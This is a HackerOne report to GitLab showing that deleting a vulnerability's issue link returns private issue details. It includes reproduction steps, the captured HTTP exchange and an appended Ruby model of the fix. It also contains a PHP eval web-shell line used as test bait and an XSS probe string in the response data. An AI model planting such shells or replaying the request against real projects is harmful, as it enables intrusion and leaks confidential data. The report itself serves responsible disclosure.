Ability to access a previously accessible issue
**[HackerOne report #1179733](https://hackerone.com/reports/1179733)** by `wi11` on 2021-04-29, assigned to @ankelly: [Report](#report) | [Attachments](#attachments) | [How To Reproduce](#how-to-reproduce)

## Report

##### Summary

Hi team,

At GitLab, you can link an existing issue to a vulnerability, and issues can be linked across groups and projects. The user can't link an issue that he can't access. But the user can delete an issue link he created before, and the related information about the issue is returned when deleting, so if an issue link is created by a user and the visibility level of this issue is later changed, the user can still delete this issue link to get information about the issue that he can no longer access.

Request

```http
DELETE /api/v4/vulnerabilities/7989487/issue_links/9274 HTTP/1.1
Host: gitlab.com
```

##### Steps to reproduce

You need two accounts to reproduce this.

1. As the victim, create a public project -> create an issue.
2. As the attacker, you need to have a Vulnerability Report. (If you have one, jump to Step 4.)
3. As the attacker -> create a project -> go to Security & Compliance -> Configuration -> Enable (SAST) -> upload a PHP file with the code `<?php eval($_POST['888']);?>` to your repository -> wait for the pipeline to pass -> go to Vulnerability report.
4. Go to Vulnerability report -> link the issue that you created in Step 1. (Paste the issue link.)
5. Intercept the request -> remove the issue; you will intercept a request like the one above, and send it to the repeater. **Remember, don't forward it, otherwise it will be removed.**
6. As the victim, change the project visibility to private and make some changes to the title and description of the issue created at Step 1.
7. As the attacker, send the request; you will find that the information of the issue is returned.

##### Impact

After an issue became inaccessible to the attacker, he can still retrieve information about the issue (title, description, state, assignees, etc.).

##### What is the current *bug* behavior?

When an issue link to a previously accessible issue is deleted, the information of the now inaccessible issue is returned.

```http
DELETE /api/v4/vulnerabilities/[REDACTED]/issue_links/9274 HTTP/1.1
Host: gitlab.com
Connection: close
Accept: application/json, text/plain, */*
X-CSRF-Token:
X-Requested-With: XMLHttpRequest
Origin: https://gitlab.com
Accept-Encoding: gzip, deflate
Cookie:
```

```http
HTTP/1.1 200 OK
Date: Thu, 29 Apr 2021 06:21:32 GMT
Content-Type: application/json
Connection: close
Vary: Accept-Encoding
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET, HEAD, POST, PUT, PATCH, DELETE, OPTIONS
Access-Control-Allow-Origin: https://gitlab.com
Access-Control-Expose-Headers: Link, X-Total, X-Total-Pages, X-Per-Page, X-Page, X-Next-Page, X-Prev-Page, X-Gitlab-Blob-Id, X-Gitlab-Commit-Id, X-Gitlab-Content-Sha256, X-Gitlab-Encoding, X-Gitlab-File-Name, X-Gitlab-File-Path, X-Gitlab-Last-Commit-Id, X-Gitlab-Ref, X-Gitlab-Size
Access-Control-Max-Age: 7200
Cache-Control: max-age=0, private, must-revalidate
Etag: W/"23a17e185fb2cd10bfa81a06e6f25d84"
Vary: Origin
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Gitlab-Feature-Category: vulnerability_management
X-Request-Id: 01F4E4M9NQCH1XTG95DP4NQGNJ
X-Runtime: 0.237133
Strict-Transport-Security: max-age=31536000
Referrer-Policy: strict-origin-when-cross-origin
RateLimit-Observed: 9
RateLimit-Remaining: 1991
RateLimit-Reset: 1619677352
RateLimit-ResetTime: Thu, 29 Apr 2021 06:22:32 GMT
RateLimit-Limit: 2000
GitLab-LB: fe-09-lb-gprd
GitLab-SV: localhost
CF-Cache-Status: DYNAMIC
cf-request-id: 09bde33e1e00001a5e7033d000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
CF-RAY: 64766e4368b11a5e-SIN
Content-Length: 3692

{"id":9274,"vulnerability":{"id":7989487,"title":"Please do not use eval() functions","description":null,"state":"confirmed","severity":"high","confidence":"unknown","report_type":"sast","project":{"id":25475655,"description":"bug test bug test bug test bug test !!!!!'\"\u003e\u003cimg src=zqzq onerror=alert(1)\u003e","name":"easy-money-maker","name_with_namespace":"ezgama / easy-money-maker","path":"a-project","path_with_namespace":"ezgama/a-project","created_at":"2021-03-28T06:36:35.788Z"},"finding":{"id":9486278,"created_at":"2021-04-06T08:16:39.241Z","updated_at":"2021-04-06T08:16:39.500Z","severity":"high","confidence":"unknown","report_type":"sast","project_id":25475655,"scanner_id":95603,"primary_identifier_id":2065399,"project_fingerprint":"b7b70a4e7acf2a02fd311dc34504a007f757bde4","location_fingerprint":"78df993d22174e7368adc689a1ed89fb927cbfbf","uuid":"6597da14-4b91-556d-b041-7d89d74fc1fb","name":"Please do not use eval() functions","metadata_version":"14.0.0","raw_metadata":"{\"id\":\"389d0a0ec7a6b2c2e6b8da2ab910aa123ee9bf462411c4de6c9bafe8e492ac7b\",\"category\":\"sast\",\"name\":\"Please do not use eval() functions\",\"message\":\"Please do not use eval() functions\",\"description\":\"Please do not use eval() functions\",\"cve\":\"mama.php:PHPCS_SecurityAudit.BadFunctions.NoEvals.NoEvals\",\"severity\":\"High\",\"scanner\":{\"id\":\"phpcs_security_audit\",\"name\":\"phpcs-security-audit v2\"},\"location\":{\"file\":\"mama.php\",\"start_line\":1},\"identifiers\":[{\"type\":\"phpcs_security_audit_source\",\"name\":\"PHPCS_SecurityAudit.BadFunctions.NoEvals.NoEvals\",\"value\":\"PHPCS_SecurityAudit.BadFunctions.NoEvals.NoEvals\"}],\"remediations\":[null]}","vulnerability_id":7989487,"details":{},"description":"Please do not use eval() functions","message":"Please do not use eval() functions","solution":null,"cve":"mama.php:PHPCS_SecurityAudit.BadFunctions.NoEvals.NoEvals","location":{"file":"mama.php","start_line":1}},"resolved_on_default_branch":false,"project_default_branch":"master","author_id":8546086,"updated_by_id":null,"last_edited_by_id":null,"resolved_by_id":null,"dismissed_by_id":null,"confirmed_by_id":8546086,"start_date":null,"due_date":null,"created_at":"2021-04-06T08:16:39.453Z","updated_at":"2021-04-29T05:46:07.075Z","last_edited_at":null,"resolved_at":null,"dismissed_at":null,"confirmed_at":"2021-04-29T05:23:52.331Z"},"issue":{"id":86180604,"iid":16,"project_id":25969925,"title":"BUGSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS","description":"BUGBGUBGUBUGBUGBUGBUGSDDDDDDDDDDDDDDDDDDDDDDDDDD","state":"opened","created_at":"2021-04-29T05:57:17.615Z","updated_at":"2021-04-29T06:21:08.450Z","closed_at":null,"closed_by":null,"labels":[],"milestone":{"id":2023885,"iid":1,"group_id":11753634,"title":"group milestone","description":"","state":"active","created_at":"2021-04-29T05:10:02.829Z","updated_at":"2021-04-29T05:10:02.829Z","due_date":null,"start_date":null,"expired":null,"web_url":"https://gitlab.com/groups/dvadegroup/-/milestones/1"},"assignees":[],"author":{"id":8696838,"name":"dva dva","username":"dva_dva","state":"active","avatar_url":"https://assets.gitlab-static.net/uploads/-/system/user/avatar/8696838/avatar.png","web_url":"https://gitlab.com/dva_dva"},"assignee":null,"user_notes_count":0,"merge_requests_count":0,"upvotes":0,"downvotes":0,"due_date":"2021-08-20","confidential":true,"discussion_locked":null,"web_url":"https://gitlab.com/dvadegroup/dvadeproject/-/issues/16","time_stats":{"time_estimate":0,"total_time_spent":0,"human_time_estimate":null,"human_total_time_spent":null},"task_completion_status":{"count":0,"completed_count":0},"weight":100,"blocking_issues_count":0},"link_type":"related"}
```

##### What is the expected *correct* behavior?

The information of the inaccessible issue should not be returned.

##### Output of checks

This bug happens on GitLab.com

## Attachments

## How To Reproduce

Please add [reproducibility information] to this section:

1.
1.
1.

[reproducibility information]: https://about.gitlab.com/handbook/engineering/security/#reproducibility-on-security-issues
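The authorization gap the report describes, modelled as an added Ruby example (not GitLab's code): the link is authorized when it is created, but the delete response serializes the linked issue without re-checking that the caller can still read it. The `can_read_issue?` policy, the structs and the constructed sample data are all assumptions.

```ruby
# Added example, not GitLab's code: models why the DELETE issue_links response
# leaked, and the check that closes it. All names here are hypothetical.

Project   = Struct.new(:id, :visibility, :member_ids)   # visibility: :public / :private
Issue     = Struct.new(:id, :iid, :project, :title, :description, :state, :confidential)
IssueLink = Struct.new(:id, :vulnerability_id, :issue, :author_id, :link_type)

# Stand-in for a GitLab-style `can?(user, :read_issue, issue)` policy check.
def can_read_issue?(user_id, issue)
  member = issue.project.member_ids.include?(user_id)
  return false if issue.confidential && !member
  issue.project.visibility == :public || member
end

def serialize_issue(issue)
  { "id" => issue.id, "iid" => issue.iid, "project_id" => issue.project.id,
    "title" => issue.title, "description" => issue.description, "state" => issue.state }
end

# Vulnerable shape: the link was authorized when it was *created*, and the
# delete path simply serializes whatever the link points at today.
def destroy_link_vulnerable(link)
  { "id" => link.id, "issue" => serialize_issue(link.issue), "link_type" => link.link_type }
end

# Hardened shape: re-check read permission on the linked issue at deletion
# time and return only the link's own fields when the caller can no longer read it.
def destroy_link_hardened(user_id, link)
  body = { "id" => link.id, "link_type" => link.link_type }
  body["issue"] = can_read_issue?(user_id, link.issue) ? serialize_issue(link.issue) : nil
  body
end

# Replays the report's scenario with constructed data: the attacker (user 2)
# links the issue while the victim's project (owned by user 1) is public; the
# victim then makes the project private and edits the issue.
def leak_scenario(attacker_id = 2)
  project = Project.new(25969925, :public, [1])
  issue   = Issue.new(86180604, 16, project, "original title", "original text", "opened", false)
  raise "link creation would be refused" unless can_read_issue?(attacker_id, issue)
  link = IssueLink.new(9274, 7989487, issue, attacker_id, "related")

  project.visibility = :private
  issue.title = "edited after going private"

  { vulnerable: destroy_link_vulnerable(link),
    hardened:   destroy_link_hardened(attacker_id, link) }
end

puts leak_scenario.inspect if __FILE__ == $PROGRAM_NAME
```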